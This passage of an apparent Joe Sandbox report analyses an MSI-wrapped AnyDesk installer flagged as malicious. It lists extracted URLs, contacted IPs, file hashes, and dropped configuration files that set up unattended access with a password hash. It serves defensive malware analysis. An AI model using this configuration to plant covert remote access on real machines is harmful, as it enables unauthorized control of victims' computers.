                  https://help.anydesk.com/wolanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://help.anydesk.com/$AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://my.anydesk.comanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.anydesk.com/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://twitter.com/home?status=Do%20you%20know%20%23AnyDesk?%20AnyDesk%20is%20a%20small%20and%20quianydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Remanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://console-ui.myanydesk2.on.anydesk.comanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.openssl.org/support/faq.htmlanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://anydesk.com/AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://anydesk.com/privacyanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://datatracker.ietf.org/ipr/1526/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.nayuki.io/page/qr-code-generator-libraryanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://policies.google.com/privacy?hl=$anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.anydesk.com/AnyDesk_on_macOSanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://help.anydesk.com/macos-securityanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://help.anydesk.com/HelpLinkInstallLocationAnyDeskanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://boot-01.net.anydesk.comanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://datatracker.ietf.org/ipr/1914/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://datatracker.ietf.org/ipr/1524/anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://anydesk.com/termsanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://anydesk.com/company#imprintanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalidanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.openssl.org/)AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://anydesk.com/orderAnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://help.anydesk.com/accessanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://help.anydesk.com/backup-aliasanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalueanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://help.anydesk.com/shareanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://my.anydesk.com/password-generator.AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.anydesk.comAnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                            		high
                                                                            https://help.anydesk.com/AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              92.223.88.41
                                                                              		boot.net.anydesk.comAustria
                                                                              		199524GCOREATfalse
                                                                              195.181.174.174
                                                                              		unknownUnited Kingdom
                                                                              		60068CDN77GBfalse
                                                                              80.209.241.3
                                                                              		unknownUnited States
                                                                              		395839HOSTKEY-USAUSfalse
                                                                              195.181.174.167
                                                                              		unknownUnited Kingdom
                                                                              		60068CDN77GBfalse

                                                                              Private

                                                                              IP
                                                                              192.168.2.3

                                                                              General Information

                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                              Analysis ID:679413
                                                                              Start date and time: 05/08/202218:21:102022-08-05 18:21:10 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 11m 50s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Sample file name:1.msi
                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                              Number of analysed new started processes analysed:30
                                                                              Number of new started drivers analysed:4
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.evad.winMSI@34/28@4/5
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HDC Information:
                                                                              • Successful, ratio: 100% (good quality ratio 83.3%)
                                                                              • Quality average: 57.3%
                                                                              • Quality standard deviation: 31.2%
                                                                              HCA Information:Failed
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .msi
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Close Viewer

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                              • Report size getting too big, too many NtFsControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              18:22:14API Interceptor3181x Sleep call for process: msiexec.exe modified
                                                                              18:22:16API Interceptor959x Sleep call for process: VSSVC.exe modified
                                                                              18:22:16API Interceptor896x Sleep call for process: svchost.exe modified
                                                                              18:23:06API Interceptor2x Sleep call for process: icacls.exe modified
                                                                              18:23:15API Interceptor206x Sleep call for process: install.exe modified
                                                                              18:23:23API Interceptor99x Sleep call for process: anydesk.exe modified
                                                                              18:23:28API Interceptor277x Sleep call for process: AnyDesk.exe modified
                                                                              18:23:59API Interceptor3x Sleep call for process: netsh.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASNs

                                                                              No context

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Config.Msi\78c343.rbs

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7322
                                                                              Entropy (8bit):5.5670592053751085
                                                                              Encrypted:false
                                                                              SSDEEP:96:89EuAeuAD8tekIQBUwVPVfbCsAqGxUwVPVfbC6j2PBOuA5AqGSHLuAlv5qZW9MNz:8euZuLev6tfm86tfmuuUumk+uNdEpW
                                                                              MD5:B7025B12AA3BE2CAE5DEF3833655E219
                                                                              SHA1:102FA7B4C4260D9D5BD7C30281BD08001BEEB23C
                                                                              SHA-256:7B29024A6914C3B956525901EF818DABF62C9C89B6368612547024862E7BF148
                                                                              SHA-512:5C72611C364608962962D2ECF12D7A1B4673BD25D7A8427A2E8898ACE59B1E34D613098E807F772833DB86F5A1786EF0D86F96AE7C1F4E226A1844AFB312B0B7
                                                                              Malicious:false
                                                                              Preview:...@IXOS.@.....@`..U.@.....@.....@.....@.....@.....@......&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..1.msi.@.....@.....@.....@........&.{8CB27BF3-59BC-4419-BE15-E9E385453F27}.....@.....@.....@.....@.......@.....@.....@.......@....F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}.@........bz.LateInstallFinish1....bz.LateInstallFinish2....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....1.SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\AnyDesk...@....(.&...LogonUser..user'.&...USERNAME..Peter Miller'.&...Date..8/5/2022'.&...Time..19:02:58'.&...WRAPPED_ARGUMENTS....RegisterProduct..Registering product..[1]......C:\Windows\Installer\78c

                                                                              C:\ProgramData\anydesk\AnyDesk.exe

                                                                              Download File
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3829888
                                                                              Entropy (8bit):7.999053982852042
                                                                              Encrypted:true
                                                                              SSDEEP:98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3
                                                                              MD5:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              SHA1:78C9302C7A387A8D158F38D501784BE9B8B2716D
                                                                              SHA-256:AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
                                                                              SHA-512:7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L.....1b.........."......*....:..^...........@....@...................................:...@..........................................p..PH...........4:..<...........................................................................................text...5(.......*.................. ..`.itext...^...@...........................rdata..............................@..@.data.....9.......9..2..............@....rsrc...PH...p...J....9.............@..@.reloc...............0:.............@..B................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\anydesk\service.conf

                                                                              Download File
                                                                              Process:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              File Type:ASCII text, with very long lines
                                                                              Category:dropped
                                                                              Size (bytes):2898
                                                                              Entropy (8bit):6.03920180688192
                                                                              Encrypted:false
                                                                              SSDEEP:48:uISTiIhiUqIhAIH/ARw+Pi+2ZeFL8GjZnHA5OFh31vtd9CgtiFjRcFmKBI45:uIST/iUx1/AJPi2FNpAwFjP9TtccFFd5
                                                                              MD5:D78C36C1B2DF59D1D7A19E89218822A8
                                                                              SHA1:9D14F9FE8AF7BDF5EB25F7BEA366E4C7C6DB8389
                                                                              SHA-256:1932C23AE6AB035EF6AB0E224EF58638AF13DFD12C53A2BC13E7A281CFE51717
                                                                              SHA-512:974080C66AA8AD073450A3A44F97FA48FAB8F872BEEBE0CC25801E2D66ADF6BF184B9C6D1D80A9C3941EC991496D327393228A0A902D65AD0D4B7B55EA3F3801
                                                                              Malicious:false
                                                                              Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjIwODA2MDEyMzMwWhgPMjA3MjA3MjQwMTIzMzBaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEA3m9s0Xt1t6ybpCuW6GUgR24wf33iMQUiJAkO3evQMW3zyFFXrNZcRj0gHy6w\nBL21EgWWFj2otf99+2oj08znVPz3mdvxzGSw/UoyvVxy/gmtRT3WsMxcAvfd9EDV\nyAPwLRcp3mII7ngo1WZi0jDp0gWsbbDtdTXnNjJeTSKgLhh0VUIhYG4GpCPYcCzF\nzLUb+u1d6dYRj1r2nIhLHJ5a8Z2KcGlYtWvpin/OcMSw154LmU+WpLriSvk2acpu\nxpVJ65OTluRkbl4jmxjseMDXhK9cRLjPEHYCcERRJO+JsAO0h7oMEA8kb0YDQTz4\nxnIGxSU5NbzP5mXYU3Db0+7DyQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQBgKZcB\ndwulkUuSK1r+HxcUkJlxVhs2UJvxaDaj7xsNFiH8+U+ljppHLIPE/OGC/ENBjrQm\n8FMlI3kBnZh751nIsaYK5LoPXOFz9wTesecg7kQzYsFJOmwdg9pTMT8gIh9kzU3W\n3SQH6kvGz7EPfSRxl1JjzVLqbI5xGCtOi4WFl3Y0upNHz8wVAdHt9+ReuYH1cC0t\nCAIjwdr26SmLy9XCcwcx6NsGf1FWYG4kURtaU/vJaqb+HDWZXICa11e2msyfIq1m\n4dGSYqDD+LTLd61V16rRBlY747w2QTxgc47coAPCaRhaKMWOY9oYWWHTaP6MJZVi\nLolPxJ9cTEJ8dHHY\n-----END CERTI

                                                                              C:\ProgramData\anydesk\system.conf

                                                                              Download File
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):664
                                                                              Entropy (8bit):4.694299449856687
                                                                              Encrypted:false
                                                                              SSDEEP:12:oUrQM3uqQHvWhOLroBGgFBGgItgw/T5hgnx7b0wlcpv:dF37AwetBVBTPC7bJlSv
                                                                              MD5:49B7C6D323D2E373B0CEAEB28B4BBDC5
                                                                              SHA1:0E5D4E26427190E07495FCC5FBFE46A20C07FCAA
                                                                              SHA-256:4E120EA4CAECD70BF796C634FA2278FAF0BA5424406D1AA367957210B666644A
                                                                              SHA-512:BC5EF736EC71E6940422240523978D6B918B5747AE30437188757458DDA415B02FB9CD61B208C59C5B89991D0557E4BEE4FE6ABB61BBBC3D63C0A5C733326571
                                                                              Malicious:false
                                                                              Preview:ad.anynet.fpr=ad8fec6ce2ea9587309c50b97175d8ed639a9f09.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=0.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles._unattended_access.pwd=29a3bbba8f6029c5e4ab4fe97081df7dfcfd6458966ad8df64e9a620697bfd59.ad.security.permission_profiles._unattended_access.salt=a3a4ac0604db119fa69085484617bf37.ad.security.permission_profiles.version=1.ad.security.update_channel=stable.ad.security.update_type=0.

                                                                              C:\System Volume Information\SPP\OnlineMetadataCache\{13f380d2-c95e-45d3-8b58-ce3c6d9cc4c1}_OnDiskSnapshotProp

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3048
                                                                              Entropy (8bit):3.694456222285318
                                                                              Encrypted:false
                                                                              SSDEEP:48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW
                                                                              MD5:5F246453E47299A07D8C949665C8A0FE
                                                                              SHA1:5B341BA26C94F782A34C5523FAC302B7BCD3411A
                                                                              SHA-256:2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419
                                                                              SHA-512:DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28
                                                                              Malicious:false
                                                                              Preview:.D.....M..,....c.Pc<.......................^..E.X.<m...8.......@..5...........M..0.<fK...; ...............................$.......8...Q.......Q...I.n.s.t.a.l.l.e.d. .A.n.y.d.e.s.k. .-. .U.N.R.E.G.I.S.T.E.R.E.D. .-. .W.r.a.p.p.e.d. .u.s.i.n.g. .M.S.I. .W.r.a.p.p.e.r. .f.r.o.m. .w.w.w...e.x.e.m.s.i...c.o.m.................C.:.\.W.i.n.d.o.w.s.\...............1.7.9.6.0.5.................W.O.R.K.G.R.O.U.P.......Zi.A.@.H..i.tE<.....................).(?..P............. ...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\...............C.:.\...........N).A.j..j...............(...0.......,...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\.......4...............(.C.:.).........<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|.......%.......%...A.d.o.b.e. .A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C. .1.9...0.1.0...2.0.0.9.8.....).......)...A.d.o.b.e. .F.l.a.s.h. .P.l.

                                                                              C:\System Volume Information\SPP\metadata-2

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:SysEx File - Twister
                                                                              Category:dropped
                                                                              Size (bytes):8734472
                                                                              Entropy (8bit):3.681659655459525
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+8+YgDYEzT4G09wYKc9rMjG/BWigr7dCKV0/HwLQt+Y/g4zsuAvm7gPI+PhgcIrd:d0jYY8BWitXZh7TeQsPIy1YQza
                                                                              MD5:9CC465911CDBD0BFC8D7BFC74ECCE88B
                                                                              SHA1:867E1C21ADBC08A0BC12B1ED50F59EB3A78EC23F
                                                                              SHA-256:BA671D105C6C5A76B5B2D369E12887BCF3C729CFCF34F222A6DB2D4FF3AA666E
                                                                              SHA-512:04D495AC9EBEDC50F9FF325912A19A31B00A54EB0FA99830FBB6B1CBFB1847A21447BE699FE42AD45F80842E1D672F44FAEA0C38519CFEFAB4C86547106CDCF0
                                                                              Malicious:false
                                                                              Preview:.%..=..J.....>.(_kb..............F...................... ...Y.......Y...<.B.A.C.K.U.P._.C.O.M.P.O.N.E.N.T.S. .x.m.l.n.s.=.".x.-.s.c.h.e.m.a.:.#.V.s.s.C.o.m.p.o.n.e.n.t.M.e.t.a.d.a.t.a.". .v.e.r.s.i.o.n.=.".1...2.". .b.o.o.t.a.b.l.e.S.y.s.t.e.m.S.t.a.t.e.B.a.c.k.u.p.=.".y.e.s.". .s.e.l.e.c.t.C.o.m.p.o.n.e.n.t.s.=.".y.e.s.". .b.a.c.k.u.p.T.y.p.e.=.".f.u.l.l.". .p.a.r.t.i.a.l.F.i.l.e.S.u.p.p.o.r.t.=.".y.e.s.". .s.n.a.p.s.h.o.t.S.e.t.I.d.=.".1.3.f.3.8.0.d.2.-.c.9.5.e.-.4.5.d.3.-.8.b.5.8.-.c.e.3.c.6.d.9.c.c.4.c.1.".>.<.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S. .i.n.s.t.a.n.c.e.I.d.=.".4.5.8.b.f.6.d.0.-.9.8.7.c.-.4.5.2.7.-.b.7.b.9.-.5.d.4.0.5.2.4.a.2.1.2.4.". .w.r.i.t.e.r.I.d.=.".e.8.1.3.2.9.7.5.-.6.f.9.3.-.4.4.6.4.-.a.5.3.e.-.1.0.5.0.2.5.3.a.e.2.2.0.". .b.a.c.k.u.p.S.c.h.e.m.a.=.".0.".>.<.C.O.M.P.O.N.E.N.T. .c.o.m.p.o.n.e.n.t.N.a.m.e.=.".S.y.s.t.e.m. .F.i.l.e.s.". .c.o.m.p.o.n.e.n.t.T.y.p.e.=.".f.i.l.e.g.r.o.u.p."./.>.<./.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S.>.<.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S. .i.

                                                                              C:\System Volume Information\SPP\snapshot-2

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
